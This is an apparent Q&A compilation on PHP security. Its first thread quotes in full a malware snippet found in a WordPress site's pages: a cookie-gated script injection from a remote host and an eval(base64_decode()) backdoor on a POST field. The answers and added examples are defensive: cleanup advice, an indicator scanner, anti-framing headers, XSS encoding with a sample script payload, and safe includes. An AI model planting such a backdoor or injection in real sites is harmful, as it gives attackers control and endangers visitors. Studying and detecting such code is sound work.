What will this PHP script do? Is it malicious PHP code?

Can someone please advise what this PHP code will do? I have found this code in every .php page, and only there; other files like js / css / php.ini are fine. Is this malicious code? If yes, please suggest how to prevent the malicious activity.
Here is the Code:
global $sessdt_o;
if(!$sessdt_o) {
    $sessdt_o = 1;
    $sessdt_k = "lb11";
    if(!@$_COOKIE[$sessdt_k]) {
        // first visit from this browser: only set a marker cookie
        $sessdt_f = "102";
        if(!@headers_sent()) {
            @setcookie($sessdt_k,$sessdt_f);
        } else {
            echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>";
        }
    } else {
        if($_COOKIE[$sessdt_k]=="102") {
            // second visit: replace the marker with a random value, load a
            // script from the remote host, then refresh back to the same URL
            $sessdt_f = (rand(1000,9000)+1);
            if(!@headers_sent()) {
                @setcookie($sessdt_k,$sessdt_f);
            } else {
                echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>";
            }
            $sessdt_j = @$_SERVER["HTTP_HOST"].@$_SERVER["REQUEST_URI"];
            $sessdt_v = urlencode(strrev($sessdt_j));
            $sessdt_u = "http://vekra.ee/?rnd=".$sessdt_f.substr($sessdt_v,-200);
            echo "<script src='$sessdt_u'></script>";
            echo "<meta http-equiv='refresh' content='0;url=http://$sessdt_j'><!--";
        }
    }
    // backdoor: any POST with a "showimg" field is decoded and executed
    $sessdt_p = "showimg";
    if(isset($_POST[$sessdt_p])){
        eval(base64_decode(str_replace(chr(32),chr(43),$_POST[$sessdt_p])));
        exit;
    }
}

I haven't examined it closely, but the line
eval(base64_decode(str_replace(chr(32),chr(43),$_POST[$sessdt_p])));
alone shows me that it is, if not malicious, then very, very close: code injection is possible.

It's more likely that it will redirect your every page to the attacker's website.
The @ will halt any errors, so you won't get any logs from this script.
You should remove it if you want your site to work properly.
EDIT: it doesn't redirect, but it will inject anything it wants on your pages.
The second part of the script, where it checks for cookies, will add a JavaScript from his website and can do malicious things.
The last part, I don't think anyone will be able to guess what it is, because it relies on a POST variable, $_POST['showimg']; I guess he attacked your website with POST.
Things to do: change your passwords; check the write permissions on your files (they shouldn't be 0777); back up the database and WordPress template; delete the WordPress install and re-install from scratch. In your template, search for his code, then add your cleaned template.
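As an added example (not code from the question or any of the answers): a read-only PHP command-line scanner that walks a web root and reports files containing the indicators visible in the snippet above, plus any PHP file that is world-writable, which is the 0777 problem the answer mentions. The indicator list, the function names and the directory argument are assumptions for illustration.

```php
<?php
// Added example, not from the question or answers. Read-only: it reports
// files matching indicators seen in the infected snippet and files that are
// world-writable; it changes nothing. Run as: php scan.php /var/www/html
// (the path is an assumed example).

// Indicators taken from the snippet. The cookie name, the variable prefix and
// the remote host are specific to this infection; the eval(base64_decode(...))
// pattern is generic and worth flagging anywhere it appears.
$indicators = [
    'eval_base64'   => '/eval\s*\(\s*base64_decode\s*\(/i',
    'sessdt_vars'   => '/\$sessdt_[a-z]\b/',
    'cookie_lb11'   => '/["\']lb11["\']/',
    'remote_host'   => '/vekra\.ee/i',
    'cookie_script' => '/document\.cookie=/',
];

// Scan one file; returns one entry per (line, indicator) match.
function scanFile(string $path, array $indicators): array {
    $hits = [];
    if (!is_readable($path)) {
        return $hits;
    }
    $lines = file($path, FILE_IGNORE_NEW_LINES);
    foreach ($lines as $n => $line) {
        foreach ($indicators as $name => $pattern) {
            if (preg_match($pattern, $line)) {
                $hits[] = ['line' => $n + 1, 'indicator' => $name, 'text' => trim($line)];
            }
        }
    }
    return $hits;
}

// Walk the tree; check every .php file for indicators and for the
// world-writable bit (0002), which lets any local process rewrite it.
function scanTree(string $root, array $indicators): array {
    $report = [];
    $files = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS)
    );
    foreach ($files as $file) {
        if (!$file->isFile() || strtolower($file->getExtension()) !== 'php') {
            continue;
        }
        $path = $file->getPathname();
        $entry = [
            'hits'           => scanFile($path, $indicators),
            'world_writable' => ($file->getPerms() & 0002) !== 0,
        ];
        if ($entry['hits'] || $entry['world_writable']) {
            $report[$path] = $entry;
        }
    }
    return $report;
}

$root = $argv[1] ?? '.';
$report = scanTree($root, $indicators);
foreach ($report as $path => $entry) {
    echo $path, $entry['world_writable'] ? '  [world-writable]' : '', PHP_EOL;
    foreach ($entry['hits'] as $hit) {
        printf("  line %d [%s]: %s\n", $hit['line'], $hit['indicator'], substr($hit['text'], 0, 80));
    }
}
echo count($report), ' file(s) need attention', PHP_EOL;
```

The report tells you which files to restore from a clean copy; it does not clean them, because an infected install should be replaced from a known-good source as the answer says, not patched in place.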

Your problem is not the code itself, it's how it got there in the first place. You need to check the write permissions on your files/folders to make sure no one from the outside can modify them.
You mentioned that you're using WordPress; please read this article about hardening WordPress security. I suggest that you lock down your blog (if it's feasible) until you fix your security issues.

I'm a security analyst and I believe it is redirecting you to a possibly malicious website if and only if you do not have that cookie. If you already have that cookie, then the script will know you have already been there and are possibly researching the malware, thus not executing the redirect. The image may be like a detect-debugger preset API. This is just my opinion.

Related

How do I stop users being able to see website code

The dilemma I have is that my website index.php calls a template PHP file on a button press like this:
    case 'main':
        $page = getTemplate('main.php', array('user'=>$user));
        echo $page;
        break;
This main.php template file is in a folder at "/var/www/template/". How do I stop people going to domain.com/template/main.php and viewing the code for that page? I think the solution would be to make it so that only localhost can pull it and display it, rather than the user, or something along those lines. Any help would be appreciated, thank you.
Like a comment said, the PHP file will not be printed; it will print the HTML result that the PHP file produces.
Maybe it produces some errors indicating vulnerabilities to a potential attacker? If that's your case, you should handle this directly in the PHP code or use a .htaccess at the root of your site. You can find some help here:
How to deny access to a file in .htaccess
Managed to fix this by putting this at the top of the php page I wanted to render:
<?php
if (!isset($_GET['page'])) {
    header('Location: /main');
    exit();
}
?>
This means if someone goes "domain.com/template/main.php" to attempt to view the source code, it will redirect them back to the main webpage for my site. Thanks for your suggestions however.

One file checks, the other file checks too, but they have to be connected without changing variables

I am building a website where people need to go to one page. The page checks if something has already been done. If it hasn't been done yet, it will load the page without redirecting and give the steps somebody has to do. After doing that, it will redirect the person to another file, which checks if it has been done and gives a reward. Between those two requests people can change variables, or go directly to the second file. How can I make sure people don't skip the other file? I thought about using Google reCAPTCHA v2, but I want to get some advice from you guys first, because I know that there are captcha-solving websites (DeathByCaptcha etc.).
I would be really thankful!
EDIT:
I have already made a verification method, where people get a key at the first file and the second file checks it. Before those two files, there is another file that just sends the person's IP through the session. Here it is:
    session_start(); // needed before $_SESSION is read; assumed to happen earlier in the poster's setup
    $GRFL = $_POST['amount'];
    $OMFG = $_POST['username'];
    $ip = GetIP(); // the poster's own helper, not shown in the question
    $ip = md5(md5(md5(md5(md5(md5(md5(md5(md5(md5(md5($ip)))))))))));
    if ($_SESSION['ip'] != $ip) {
        header('Location: '.$url); // $url is defined elsewhere in the poster's code
        die();
    } else {
        $query = md5($ip.md5(md5($GRFL.$OMFG.$ip).md5($OMFG)).$ip);
        $_SESSION['query'] = $query;
    }
But I don't know if it is enough...
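One way to connect the two files without trusting anything the visitor can change in between, as an added example that is not the poster's code: the proof that step one was completed is stored only in the server-side session and is consumed the first time step two reads it. The function names, the file names step1.php/step2.php and the 900-second lifetime are assumptions.

```php
<?php
// Added example, not the poster's code. The proof that step 1 was completed
// lives only in the server-side session, so nothing the visitor can edit
// between the two requests (form fields, cookies other than the session id)
// changes what step 2 sees. Assumes PHP 7.1+ and cookie-based sessions.
session_start();

const STEP_MAX_AGE = 900; // seconds a completed step 1 stays valid (assumed value)

// Call at the end of step 1, after the visitor has done what that page asks.
// The values step 2 needs are captured here, from the request step 1 already
// validated, and are never re-read from the client.
function completeStepOne(string $username, int $amount): void {
    session_regenerate_id(true); // fresh session id: a pre-set id cannot be reused
    $_SESSION['step1'] = [
        'username' => $username,
        'amount'   => $amount,
        'issued'   => time(),
    ];
}

// Call at the start of step 2. Returns the recorded values, or null if step 1
// was not completed in this session or the record is stale. The record is
// removed on first use, so one completion can only be rewarded once.
function claimStepTwo(): ?array {
    if (!isset($_SESSION['step1']['issued'])) {
        return null;
    }
    $record = $_SESSION['step1'];
    unset($_SESSION['step1']);
    if (time() - $record['issued'] > STEP_MAX_AGE) {
        return null;
    }
    return $record;
}

// How the two pages use it (step1.php / step2.php are assumed names):
//   step1.php: completeStepOne($username, $amount); header('Location: /step2.php'); exit;
//   step2.php: $claim = claimStepTwo();
//              if ($claim === null) { header('Location: /step1.php'); exit; }
//              ... grant the reward using $claim['username'] and $claim['amount'] ...

// Walk-through on the command line with constructed values: a direct visit
// to step 2, a normal run through step 1 then step 2, and a repeated claim.
if (PHP_SAPI === 'cli') {
    var_dump(claimStepTwo());            // nothing recorded yet
    completeStepOne('alice', 5);
    var_dump(claimStepTwo());            // the record step 1 stored
    var_dump(claimStepTwo());            // already consumed
}
```

Because the username and amount step two works with come from the session record rather than from a second form post, a visitor who edits the form between the two requests only changes values that are no longer read.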

Prevent loading PHP pages into Joomla wrapper

I'm the owner of a web site with a dozen web pages. The pages were made using PHP. Some time ago I discovered that some guys, using the Joomla CMS and its wrapper menu option, included my starting (login) page there, and in this way confused members and other visitors, especially because the wrapper "window" isn't big enough and some information on my page isn't visible. In this way visitors connect these pages with me and get a bad feeling about my whole site. I contacted these guys but got no answer; then I tried to solve it by using the $_SERVER['HTTP_REFERER'] superglobal, but I didn't get a right and working solution for this problem. Has someone experienced a similar problem? Thanks.
EDIT - This is the code
$HTTP_REFERRER=%SERVER['HTTP_REFERER'];
if ($HTTP_REFERRER) {
    // check if the referrer is on your noentry list
    // if so redirect it to another page
    if ($HTTP_REFERRER == "www.mean.visitor.com") {
        echo 'referer is' . $HTTP_REFERRER;
        die;
    } // shows the referrer and formats ur local harddrive
    echo "You came from $HTTP_REFERRER";
} else {
    //everything is OK
}
From the code you posted, the first problem I see is on the first line:
$HTTP_REFERRER=%SERVER['HTTP_REFERER'];
should be
$HTTP_REFERRER=$_SERVER['HTTP_REFERER'];
Then in the second if you must insert the web addresses you want to block, so change
if ($HTTP_REFERRER == "www.mean.visitor.com")
to
if ($HTTP_REFERRER == "the address you want to block")
And write die() instead of die.
Has something changed?
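As an added example (not the poster's or the answerer's code): the referrer check from the thread with the corrected $_SERVER access and a list of blocked hosts, preceded by the two response headers that tell a browser not to render the page inside a frame on another origin. It assumes the Joomla wrapper shows the page in an iframe, and the host name in the list is the thread's placeholder.

```php
<?php
// Added example, not the poster's or the answerer's code. Must run before any
// output, since it sends headers. Assumption: the Joomla wrapper menu item
// shows the page inside an iframe; these two headers make the browser refuse
// to render this page in a frame on any other origin, and that does not
// depend on what Referer, if any, the embedding site causes to be sent.
header('X-Frame-Options: SAMEORIGIN');
header("Content-Security-Policy: frame-ancestors 'self'");

// The referrer check from the thread, with the $_SERVER access the answer
// corrected. The Referer header is optional and can be stripped by the
// browser or a proxy, so use it for a friendly message, not as the only control.
$blockedHosts = ['www.mean.visitor.com']; // placeholder from the thread; list real hosts here

// Host part of the Referer, lower-cased, or '' when there is none.
function referrerHost(): string {
    $referrer = $_SERVER['HTTP_REFERER'] ?? '';
    $host = parse_url($referrer, PHP_URL_HOST);
    return is_string($host) ? strtolower($host) : '';
}

$host = referrerHost();
if ($host !== '' && in_array($host, $blockedHosts, true)) {
    http_response_code(403);
    echo 'This page must be opened directly, not from ' . htmlspecialchars($host, ENT_QUOTES, 'UTF-8');
    exit;
}
// everything is OK: render the page as usual
```

The referrer value is passed through htmlspecialchars before being echoed, since it is request data like any other.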

PHP XSS question - Is a GET parameter that outputs nothing on the page at risk?

OK, so I just wanted to know: is this necessarily an XSS vulnerability, as it does not output the results as such?
For example:
    if($_GET['doRedirect'] == "yes") {
        //redirect Page
    } else {
        //dont redirect page
    }
then
http://example.com?doRedirect=yes
I have read up on all of the XSS stuff and thought I had a good understanding of it, although now I'm slightly confused. Is XSS only possible if the user input is then output on the page?
Many thanks :)
That should be safe.
Cross site scripting can only occur if you actually output something user-generated on your page.
An example of this would be if you took in a user's name as the get parameter name and did the following:
<?php
echo "Hello, {$_GET['name']}. How are you today?";
?>
In this case, if someone set the name parameter to <script>alert('Hello, There!');</script>, they've suddenly got some JavaScript running on a URL hosted on your domain.
Granted, that example is pretty benign, but the fact that they could run that code means they could run any code they wished. They could, for instance, add a script that logged the usernames and passwords of all users that logged in through that URL. Your site would appear genuine, but they would have access to things they shouldn't have.
If you're confused about, or interested in learning more about cross site scripting, take a look at these questions:
What is the general concept behind XSS?
What is the way(best practice) to deal with XSS?
How does XSS work?
What are the best practices for avoiding xss attacks in a PHP site
Assuming that you only use the doRedirect input parameter in that if statement and nothing else, then it is not vulnerable.
If you were to do something like this, then yes it would be vulnerable:
if($_GET['doRedirect'] == "yes")
{
    //redirect Page
}
else
{
    //dont redirect page
    // Create message to display in the browser
    $messageToUser = 'You selected '.$_GET['doRedirect'].' for your redirection';
}
In this case you should perform validation on the input.
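As an added example (not code from either answer): the greeting from the first answer in its vulnerable form beside an output-encoded version, and the doRedirect message from the second answer restricted to the values the page understands. The function names and the allowed-value list are assumptions.

```php
<?php
// Added example, not from the answers. Shows the answer's vulnerable greeting
// beside a fixed version, and the doRedirect value from the second answer
// handled so that only a canonical value is ever echoed.

// Encode a string for an HTML text or attribute context. ENT_QUOTES covers
// both quote characters; the charset must match the page's own.
function e(string $s): string {
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Vulnerable form from the answer: the raw parameter reaches the HTML parser.
function greetUnsafe(string $name): string {
    return "Hello, {$name}. How are you today?";
}

// Fixed form: same text, input encoded, so a <script> tag in $name is shown
// as literal text instead of being executed.
function greetSafe(string $name): string {
    return 'Hello, ' . e($name) . '. How are you today?';
}

// doRedirect: comparing the value is harmless, reflecting it back is not.
// Validate against the values the page understands and echo only the
// canonical one, so a hostile value is never part of the output at all.
function redirectMessage(string $doRedirect): string {
    $allowed = ['yes', 'no'];
    if (!in_array($doRedirect, $allowed, true)) {
        $doRedirect = 'no'; // unknown input falls back to the safe default
    }
    return 'You selected ' . e($doRedirect) . ' for your redirection';
}

if (PHP_SAPI === 'cli') {
    // Constructed input of the kind the answer describes.
    $probe = "<script>alert('Hello, There!');</script>";
    echo greetUnsafe($probe), PHP_EOL;     // the tag survives into the output
    echo greetSafe($probe), PHP_EOL;       // the tag is encoded as text
    echo redirectMessage($probe), PHP_EOL; // the probe never reaches the output
} else {
    $name = $_GET['name'] ?? 'guest';
    $doRedirect = $_GET['doRedirect'] ?? 'no';
    echo greetSafe(is_string($name) ? $name : 'guest'), '<br>',
         redirectMessage(is_string($doRedirect) ? $doRedirect : 'no');
}
```

The is_string checks in the web branch matter because a request like ?name[]=x makes $_GET['name'] an array, which the typed functions would otherwise reject with a TypeError.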

Include safety

<?php
if (preg_match('/^[a-z0-9]+$/', $_GET['page'])) {
    $page = realpath('includes/'.$_GET['page'].'.php');
    $tpl = realpath('templates/'.$_GET['page'].'.html');
    if ($page && $tpl) {
        include $page;
        include $tpl;
    } else {
        // log error!
    }
} else {
    // log error!
}
?>
How safe would you say this is?
Gumbo here on Stack Overflow wrote it.
Dynamic Include Safety
I wanna hear your opinions.
cheers
My first thought isn't about safety, but about why in the world would you do that?
I'd say it's pretty safe. Just don't allow anything to write to those folders. PHP files are traditionally inside the web root of a server which is dangerous to start with. It would be better to place the files being loaded to an area that's absolutely inaccessible to the outside given a configuration error or a .htaccess file going missing.
You're including your own code. How safe is it?
I could see some potential issues there, especially if the 'page' variable contained '..' or other such things that could allow them to see something they weren't supposed to be able to see.
I do something similar on a few sites of mine, but I would first check 'page' to make sure it references one of a set of allowed pages.
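As an added example (not Gumbo's snippet, the poster's code, or any answer's), a front controller that serves both the "stop users seeing website code" question above (page code and templates live outside the document root, so /template/main.php is not a URL that exists) and the "Include safety" question (the page name must match an allowlist, and the resolved path is checked to lie inside the intended directory, as the last answer suggests). The directory layout, the allowlist entries and the IN_APP guard constant are assumptions.

```php
<?php
// Added example, not Gumbo's snippet or the poster's code. Assumed layout
// (illustrative paths, not the poster's):
//   /var/www/html/index.php          document root: the only public PHP file
//   /var/www/app/pages/main.php      page code, included by index.php
//   /var/www/app/templates/main.html template for that page
// Each file under pages/ starts with: defined('IN_APP') or exit;
// so even if one were ever reachable by URL it would produce nothing.
define('IN_APP', true);
$appDir = dirname(__DIR__) . '/app'; // /var/www/app when this file is /var/www/html/index.php

// Only these names can ever be included, whatever the request says.
const ALLOWED_PAGES = ['main', 'about', 'contact'];

// Resolve $name inside $dir, refusing anything that ends up elsewhere.
// realpath() collapses "..", "." and symlinks; the prefix check afterwards
// catches escapes the regex in the question cannot see, for example a
// symlink that someone managed to drop into the directory.
function resolveInside(string $dir, string $name): ?string {
    $realDir = realpath($dir);
    $real = realpath($dir . DIRECTORY_SEPARATOR . $name);
    if ($realDir === false || $real === false) {
        return null;
    }
    if (strpos($real, $realDir . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $real;
}

// Exact allowlist match rather than a character-class regex: "../main",
// "main\0" or an array parameter never get near the filesystem.
function pickPage($requested): ?string {
    if (!is_string($requested)) {
        return null;
    }
    return in_array($requested, ALLOWED_PAGES, true) ? $requested : null;
}

$page = pickPage($_GET['page'] ?? 'main');
$code = $page === null ? null : resolveInside("$appDir/pages", "$page.php");
$tpl  = $page === null ? null : resolveInside("$appDir/templates", "$page.html");
if ($code === null || $tpl === null) {
    $raw = $_GET['page'] ?? '';
    error_log('rejected page parameter: ' . substr(is_string($raw) ? $raw : '[array]', 0, 40));
    http_response_code(404);
    exit;
}
include $code;
include $tpl;
```

With this layout the web server can only serve index.php; the realpath containment check is a second line of defence for the case the first answer raises, a misconfiguration or a stray file that makes the app directory writable.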
